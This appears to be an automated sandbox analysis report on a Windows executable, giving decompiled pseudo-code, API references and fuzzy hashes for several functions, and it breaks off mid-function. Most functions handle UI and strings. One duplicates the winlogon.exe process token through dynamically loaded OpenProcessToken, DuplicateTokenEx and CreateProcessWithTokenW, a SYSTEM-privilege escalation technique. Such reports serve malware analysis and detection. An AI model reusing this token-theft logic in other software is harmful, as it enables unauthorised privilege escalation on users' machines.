                                                                                                                0x00000000
                                                                                                                0x0040ae13
                                                                                                                0x00000000
                                                                                                                0x0040ae10

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memcpy
                                                                                                                • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                • API String ID: 3510742995-3273207271
                                                                                                                • Opcode ID: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                                                • Instruction ID: 19d6e8f9099fa728be05f60bd268fa70c064aa74fae363856be53b9475c854a8
                                                                                                                • Opcode Fuzzy Hash: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                                                • Instruction Fuzzy Hash: FE01D25AEC8320A5EA302055DC86F7B2514D7B2B51FA5013BB986392C1E2BD09A7A1DF
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004041EB, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 197fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004041EB(intOrPtr* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr* _v12;
				void _v534;
				short _v536;
				void* __ebx;
				void* __edi;
				intOrPtr _t42;
				intOrPtr* _t95;
				RECT* _t96;

				_t95 = __ecx;
				_v12 = __ecx;
				if(_a4 == 0x233) {
					_v536 = 0;
					memset( &_v534, 0, 0x208);
					DragQueryFileW(_a8, 0,  &_v536, 0x104);
					DragFinish(_a8);
					 *((intOrPtr*)( *_t95 + 4))(0);
					E00404923(0x104, _t95 + 0x1680,  &_v536);
					 *((intOrPtr*)( *_v12 + 4))(1);
					_t95 = _v12;
				}
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t42 = _a12;
							 *((intOrPtr*)(_t42 + 0x18)) = 0x1f4;
							 *((intOrPtr*)(_t42 + 0x1c)) = 0x12c;
						}
					} else {
						E00402EC8(_t95 + 0x40);
					}
				} else {
					_v8 = BeginDeferWindowPos(0xd);
					_t96 = _t95 + 0x40;
					E00402E22(_t96, _t44, 0x401, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 2, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x419, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40f, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40e, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40d, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x3fb, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x3fd, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x402, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3e9, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ea, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ee, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x3f3, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x404, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3f6, 1, 0, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t96 + 0x10), _t96, 1);
					_t95 = _v12;
				}
				return E00402CED(_t95, _a4, _a8, _a12);
			}












                                                                                                                0x004041f9
                                                                                                                0x00404205
                                                                                                                0x00404208
                                                                                                                0x00404217
                                                                                                                0x0040421e
                                                                                                                0x00404236
                                                                                                                0x0040423f
                                                                                                                0x0040424a
                                                                                                                0x0040425f
                                                                                                                0x0040426b
                                                                                                                0x0040426e
                                                                                                                0x0040426e
                                                                                                                0x00404275
                                                                                                                0x004043be
                                                                                                                0x004043ce
                                                                                                                0x004043d0
                                                                                                                0x004043d3
                                                                                                                0x004043da
                                                                                                                0x004043da
                                                                                                                0x004043c0
                                                                                                                0x004043c3
                                                                                                                0x004043c3
                                                                                                                0x0040427b
                                                                                                                0x0040428c
                                                                                                                0x0040428f
                                                                                                                0x00404295
                                                                                                                0x004042a5
                                                                                                                0x004042b8
                                                                                                                0x004042cb
                                                                                                                0x004042de
                                                                                                                0x004042f1
                                                                                                                0x00404304
                                                                                                                0x00404317
                                                                                                                0x0040432a
                                                                                                                0x0040433d
                                                                                                                0x00404350
                                                                                                                0x00404363
                                                                                                                0x00404376
                                                                                                                0x00404389
                                                                                                                0x0040439c
                                                                                                                0x004043a4
                                                                                                                0x004043af
                                                                                                                0x004043b5
                                                                                                                0x004043b5
                                                                                                                0x004043f5

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040421E
                                                                                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00404236
                                                                                                                • DragFinish.SHELL32(?), ref: 0040423F
                                                                                                                  • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                  • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                  • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                                                  • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                                                  • Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4
                                                                                                                • BeginDeferWindowPos.USER32 ref: 0040427D
                                                                                                                • EndDeferWindowPos.USER32(?), ref: 004043A4
                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 004043AF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: DeferWindow$DragRect$BeginClientFileFinishInvalidateItemQuerymemcpymemsetwcslen
                                                                                                                • String ID: $
                                                                                                                • API String ID: 2142561256-3993045852
                                                                                                                • Opcode ID: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                                                • Instruction ID: d1d17b09954fcbdb96c5267886444c332edca9ead5b56a9d6021aa5aec52b2c2
                                                                                                                • Opcode Fuzzy Hash: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                                                • Instruction Fuzzy Hash: F1518EB064011CBFEB126B52CDC9DBF7E6DEF45398F104065BA05792D1C6B84E05EAB4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405B81, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 55%
                                                                                                                			E00405B81(signed short __ebx) {
				signed int _t21;
				void* _t22;
				struct HINSTANCE__* _t25;
				signed int _t27;
				void* _t35;
				signed short _t39;
				signed int _t40;
				void* _t57;
				int _t61;
				void* _t62;
				int _t71;

				_t39 = __ebx;
				if( *0x41c470 == 0) {
					E00405ADF();
				}
				_t40 =  *0x41c468;
				_t21 = 0;
				if(_t40 <= 0) {
					L5:
					_t57 = 0;
				} else {
					while(_t39 !=  *((intOrPtr*)( *0x41c460 + _t21 * 4))) {
						_t21 = _t21 + 1;
						if(_t21 < _t40) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t57 =  *0x41c458 +  *( *0x41c464 + _t21 * 4) * 2;
				}
				L6:
				if(_t57 != 0) {
					L21:
					_t22 = _t57;
				} else {
					if((_t39 & 0x00010000) == 0) {
						if( *0x40fb90 == 0) {
							_push( *0x41c478 - 1);
							_push( *0x41c45c);
							_push(_t39);
							_t25 = E00405CE7();
							goto L15;
						} else {
							wcscpy(0x40fda0, L"strings");
							_t35 = E00405EDD(_t39,  *0x41c45c);
							_t62 = _t62 + 0x10;
							if(_t35 == 0) {
								L13:
								_t25 = GetModuleHandleW(0);
								_push( *0x41c478 - 1);
								_push( *0x41c45c);
								_push(_t39);
								goto L15;
							} else {
								_t61 = wcslen( *0x41c45c);
								if(_t61 == 0) {
									goto L13;
								}
							}
						}
					} else {
						_t25 = GetModuleHandleW(_t57);
						_push( *0x41c478 - 1);
						_push( *0x41c45c);
						_push(_t39 & 0x0000ffff);
						L15:
						_t61 = LoadStringW(_t25, ??, ??, ??);
						_t71 = _t61;
					}
					if(_t71 <= 0) {
						L20:
						_t22 = 0x40c4e8;
					} else {
						_t27 =  *0x41c46c;
						if(_t27 + _t61 + 2 >=  *0x41c470 ||  *0x41c468 >=  *0x41c474) {
							goto L20;
						} else {
							_t57 =  *0x41c458 + _t27 * 2;
							_t14 = _t61 + 2; // 0x2
							memcpy(_t57,  *0x41c45c, _t61 + _t14);
							 *( *0x41c464 +  *0x41c468 * 4) =  *0x41c46c;
							 *( *0x41c460 +  *0x41c468 * 4) = _t39;
							 *0x41c468 =  *0x41c468 + 1;
							 *0x41c46c =  *0x41c46c + _t61 + 1;
							if(_t57 != 0) {
								goto L21;
							} else {
								goto L20;
							}
						}
					}
				}
				return _t22;
			}














                                                                                                                0x00405b81
                                                                                                                0x00405b88
                                                                                                                0x00405b8a
                                                                                                                0x00405b8a
                                                                                                                0x00405b8f
                                                                                                                0x00405b96
                                                                                                                0x00405b9b
                                                                                                                0x00405bad
                                                                                                                0x00405bad
                                                                                                                0x00405b9d
                                                                                                                0x00405b9d
                                                                                                                0x00405ba8
                                                                                                                0x00405bab
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405bab
                                                                                                                0x00405be9
                                                                                                                0x00405be9
                                                                                                                0x00405baf
                                                                                                                0x00405bb1
                                                                                                                0x00405ce2
                                                                                                                0x00405ce2
                                                                                                                0x00405bb7
                                                                                                                0x00405bbd
                                                                                                                0x00405bf6
                                                                                                                0x00405c4b
                                                                                                                0x00405c4c
                                                                                                                0x00405c52
                                                                                                                0x00405c53
                                                                                                                0x00000000
                                                                                                                0x00405bf8
                                                                                                                0x00405c02
                                                                                                                0x00405c0e
                                                                                                                0x00405c13
                                                                                                                0x00405c18
                                                                                                                0x00405c2c
                                                                                                                0x00405c2e
                                                                                                                0x00405c3b
                                                                                                                0x00405c3c
                                                                                                                0x00405c42
                                                                                                                0x00000000
                                                                                                                0x00405c1a
                                                                                                                0x00405c25
                                                                                                                0x00405c2a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405c2a
                                                                                                                0x00405c18
                                                                                                                0x00405bbf
                                                                                                                0x00405bc0
                                                                                                                0x00405bcd
                                                                                                                0x00405bce
                                                                                                                0x00405bd7
                                                                                                                0x00405c58
                                                                                                                0x00405c5f
                                                                                                                0x00405c61
                                                                                                                0x00405c61
                                                                                                                0x00405c63
                                                                                                                0x00405cdb
                                                                                                                0x00405cdb
                                                                                                                0x00405c65
                                                                                                                0x00405c65
                                                                                                                0x00405c74
                                                                                                                0x00000000
                                                                                                                0x00405c84
                                                                                                                0x00405c8a
                                                                                                                0x00405c8d
                                                                                                                0x00405c99
                                                                                                                0x00405caf
                                                                                                                0x00405cbd
                                                                                                                0x00405cc8
                                                                                                                0x00405cd4
                                                                                                                0x00405cd9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405cd9
                                                                                                                0x00405c74
                                                                                                                0x00405c63
                                                                                                                0x00405ce6

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                • wcscpy.MSVCRT ref: 00405C02
                                                                                                                  • Part of subcall function 00405EDD: memset.MSVCRT ref: 00405EF0
                                                                                                                  • Part of subcall function 00405EDD: _itow.MSVCRT ref: 00405EFE
                                                                                                                • wcslen.MSVCRT ref: 00405C20
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                • LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                • memcpy.MSVCRT ref: 00405C99
                                                                                                                  • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B19
                                                                                                                  • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B37
                                                                                                                  • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B55
                                                                                                                  • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B73
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                • String ID: strings
                                                                                                                • API String ID: 3166385802-3030018805
                                                                                                                • Opcode ID: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                                                • Instruction ID: 6100db9a332bdf9cdae47e625800c2dd81fdb4e1827941160d8c77da4bb91491
                                                                                                                • Opcode Fuzzy Hash: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                                                • Instruction Fuzzy Hash: F0417A74188A149FEB149B54ECE5DB73376F785708720813AE802A72A1DB39AC46CF6C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401E44, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 75%
                                                                                                                			E00401E44(int _a4, int _a8, intOrPtr* _a12) {
				char _v8;
				void* _v12;
				void* __esi;
				void* _t18;
				intOrPtr* _t22;
				void* _t23;
				void* _t28;
				int _t37;
				intOrPtr* _t39;
				intOrPtr* _t40;

				_v8 = 0;
				_t18 = OpenProcess(0x2000000, 0, _a8);
				_v12 = _t18;
				if(_t18 == 0) {
					_t37 = GetLastError();
				} else {
					_t39 = _a4 + 0x800;
					_a8 = 0;
					E0040289F(_t39);
					_t22 =  *((intOrPtr*)(_t39 + 4));
					if(_t22 == 0) {
						_t23 = 0;
					} else {
						_t23 =  *_t22(_v12, 2,  &_a8);
					}
					if(_t23 == 0) {
						_t37 = GetLastError();
					} else {
						_a4 = _a8;
						E0040289F(_t39);
						_t40 =  *((intOrPtr*)(_t39 + 8));
						if(_t40 == 0) {
							_t28 = 0;
						} else {
							_t28 =  *_t40(_a4, 0x2000000, 0, 2, 1,  &_v8);
						}
						if(_t28 == 0) {
							_t37 = GetLastError();
						} else {
							 *_a12 = _v8;
							_t37 = 0;
						}
						CloseHandle(_a8);
					}
					CloseHandle(_v12);
				}
				return _t37;
			}













                                                                                                                0x00401e59
                                                                                                                0x00401e5c
                                                                                                                0x00401e64
                                                                                                                0x00401e67
                                                                                                                0x00401ef9
                                                                                                                0x00401e6d
                                                                                                                0x00401e70
                                                                                                                0x00401e76
                                                                                                                0x00401e79
                                                                                                                0x00401e7e
                                                                                                                0x00401e83
                                                                                                                0x00401e92
                                                                                                                0x00401e85
                                                                                                                0x00401e8e
                                                                                                                0x00401e8e
                                                                                                                0x00401e96
                                                                                                                0x00401ee6
                                                                                                                0x00401e98
                                                                                                                0x00401e9b
                                                                                                                0x00401e9e
                                                                                                                0x00401ea3
                                                                                                                0x00401ea8
                                                                                                                0x00401ebb
                                                                                                                0x00401eaa
                                                                                                                0x00401eb7
                                                                                                                0x00401eb7
                                                                                                                0x00401ebf
                                                                                                                0x00401ed3
                                                                                                                0x00401ec1
                                                                                                                0x00401ec7
                                                                                                                0x00401ec9
                                                                                                                0x00401ec9
                                                                                                                0x00401ed8
                                                                                                                0x00401ed8
                                                                                                                0x00401eeb
                                                                                                                0x00401eeb
                                                                                                                0x00401f01

                                                                                                                APIs
                                                                                                                • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EF3
                                                                                                                  • Part of subcall function 0040289F: LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                                                  • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                                                  • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                                                  • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                                                  • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401ECD
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EE0
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$ErrorLast$CloseHandle$LibraryLoadOpenProcess
                                                                                                                • String ID: winlogon.exe
                                                                                                                • API String ID: 1315556178-961692650
                                                                                                                • Opcode ID: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                                                • Instruction ID: 37dd24dd8946aa7f8aa4240fd04c0d288f38f50501b3184a6b0aa07a3247aa85
                                                                                                                • Opcode Fuzzy Hash: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                                                • Instruction Fuzzy Hash: FB212932900114EFDB10AFA5CDC8AAE7BB5EB04350F14893AFE06F72A0D7749D41DA94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405236, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 79%
                                                                                                                			E00405236(short* __ebx, intOrPtr _a4) {
				int _v8;
				char _v12;
				void _v2058;
				void _v2060;
				int _t35;
				int _t41;
				signed int _t48;
				signed int _t49;
				signed short* _t50;
				void** _t52;
				void* _t53;
				void* _t54;

				_t48 = 0;
				_v2060 = 0;
				memset( &_v2058, 0, 0x7fe);
				_t54 = _t53 + 0xc;
				 *__ebx = 0;
				_t52 = _a4 + 4;
				_v12 = 2;
				do {
					_push( *_t52);
					_t6 = _t52 - 4; // 0xe80040cb
					_push( *_t6);
					_push(L"%s (%s)");
					_push(0x400);
					_push( &_v2060);
					L0040B1EC();
					_t35 = wcslen( &_v2060);
					_v8 = _t35;
					memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
					_t49 = _t48 + _v8 + 1;
					_t41 = wcslen( *_t52);
					_v8 = _t41;
					memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
					_t54 = _t54 + 0x34;
					_t52 =  &(_t52[2]);
					_t23 =  &_v12;
					 *_t23 = _v12 - 1;
					_t48 = _t49 + _v8 + 1;
				} while ( *_t23 != 0);
				_t50 = __ebx + _t48 * 2;
				 *_t50 =  *_t50 & 0x00000000;
				_t50[1] = _t50[1] & 0x00000000;
				return __ebx;
			}















                                                                                                                0x00405241
                                                                                                                0x00405250
                                                                                                                0x00405257
                                                                                                                0x0040525f
                                                                                                                0x00405262
                                                                                                                0x00405265
                                                                                                                0x00405268
                                                                                                                0x0040526f
                                                                                                                0x0040526f
                                                                                                                0x00405277
                                                                                                                0x00405277
                                                                                                                0x0040527a
                                                                                                                0x0040527f
                                                                                                                0x00405284
                                                                                                                0x00405285
                                                                                                                0x00405291
                                                                                                                0x00405296
                                                                                                                0x004052a9
                                                                                                                0x004052b3
                                                                                                                0x004052b7
                                                                                                                0x004052bc
                                                                                                                0x004052ca
                                                                                                                0x004052d2
                                                                                                                0x004052d5
                                                                                                                0x004052d8
                                                                                                                0x004052d8
                                                                                                                0x004052db
                                                                                                                0x004052db
                                                                                                                0x004052e1
                                                                                                                0x004052e4
                                                                                                                0x004052e8
                                                                                                                0x004052f2

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                • String ID: %s (%s)
                                                                                                                • API String ID: 3979103747-1363028141
                                                                                                                • Opcode ID: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                                                • Instruction ID: 65e1e814fa0bf8ea8ab085bd6ee3311c73c19872bc06834ae6b579d31858dd7b
                                                                                                                • Opcode Fuzzy Hash: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                                                • Instruction Fuzzy Hash: C411517280020DEBCF21DF94CC49D8BB7B8FF44308F1144BAE944A7152EB74A6588BD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040614F, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 78%
                                                                                                                			E0040614F(void* __ecx, void* __eflags, struct HWND__* _a4) {
				void _v514;
				short _v516;
				void _v8710;
				short _v8712;
				int _t17;
				WCHAR* _t26;

				E0040B550(0x2204, __ecx);
				_v8712 = 0;
				memset( &_v8710, 0, 0x2000);
				_t17 = GetDlgCtrlID(_a4);
				_t34 = _t17;
				GetWindowTextW(_a4,  &_v8712, 0x1000);
				if(_t17 > 0 && _v8712 != 0) {
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					GetClassNameW(_a4,  &_v516, 0xff);
					_t26 =  &_v516;
					_push(L"sysdatetimepick32");
					_push(_t26);
					L0040B278();
					if(_t26 != 0) {
						E00406025(_t34,  &_v8712);
					}
				}
				return 1;
			}









                                                                                                                0x00406157
                                                                                                                0x0040616d
                                                                                                                0x00406174
                                                                                                                0x0040617f
                                                                                                                0x00406185
                                                                                                                0x00406196
                                                                                                                0x0040619e
                                                                                                                0x004061b6
                                                                                                                0x004061bd
                                                                                                                0x004061d4
                                                                                                                0x004061da
                                                                                                                0x004061e0
                                                                                                                0x004061e5
                                                                                                                0x004061e6
                                                                                                                0x004061ef
                                                                                                                0x004061f9
                                                                                                                0x004061ff
                                                                                                                0x004061ef
                                                                                                                0x00406206

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                • String ID: sysdatetimepick32
                                                                                                                • API String ID: 1028950076-4169760276
                                                                                                                • Opcode ID: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                                                • Instruction ID: a6c41b950ec0abdba219e0cd23eeccead18917629e413d377b87badc6c60029b
                                                                                                                • Opcode Fuzzy Hash: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                                                • Instruction Fuzzy Hash: 65117732840119BAEB20EB95DC89EDF777CEF04754F0040BAF518F1192E7345A81CA9D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00404706, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52librarywindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 68%
                                                                                                                			E00404706(long __edi, wchar_t* _a4) {
				short _v8;
				void* _t8;
				void* _t10;
				long _t14;
				long _t24;

				_t24 = __edi;
				_t8 = 0;
				_t14 = 0x1100;
				if(__edi - 0x834 <= 0x383) {
					_t8 = LoadLibraryExW(L"netmsg.dll", 0, 2);
					if(0 != 0) {
						_t14 = 0x1900;
					}
				}
				if(FormatMessageW(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
					_t10 = wcscpy(_a4, 0x40c4e8);
				} else {
					if(wcslen(_v8) < 0x400) {
						wcscpy(_a4, _v8);
					}
					_t10 = LocalFree(_v8);
				}
				return _t10;
			}








                                                                                                                0x00404706
                                                                                                                0x00404714
                                                                                                                0x0040471c
                                                                                                                0x00404721
                                                                                                                0x0040472b
                                                                                                                0x00404733
                                                                                                                0x00404735
                                                                                                                0x00404735
                                                                                                                0x00404733
                                                                                                                0x00404751
                                                                                                                0x00404780
                                                                                                                0x00404753
                                                                                                                0x0040475e
                                                                                                                0x00404766
                                                                                                                0x0040476c
                                                                                                                0x00404770
                                                                                                                0x00404770
                                                                                                                0x0040478a

                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004047FA,?,?,?,004035EB,?,?), ref: 0040472B
                                                                                                                • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB), ref: 00404749
                                                                                                                • wcslen.MSVCRT ref: 00404756
                                                                                                                • wcscpy.MSVCRT ref: 00404766
                                                                                                                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB,?), ref: 00404770
                                                                                                                • wcscpy.MSVCRT ref: 00404780
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                • String ID: netmsg.dll
                                                                                                                • API String ID: 2767993716-3706735626
                                                                                                                • Opcode ID: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                                                                • Instruction ID: 89adc518ee94488043421af4a237527fbec77c55aa854962abbb3bd0e0f931e1
                                                                                                                • Opcode Fuzzy Hash: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                                                                • Instruction Fuzzy Hash: 4F01D471200114FAEB152B61DD8AE9F7A6CEB46796B20417AFA02B60D1DB755E0086AC
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040598B, Relevance: 12.1, APIs: 8, Instructions: 96COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 90%
                                                                                                                			E0040598B(void* __edx, void* __eflags, intOrPtr _a4) {
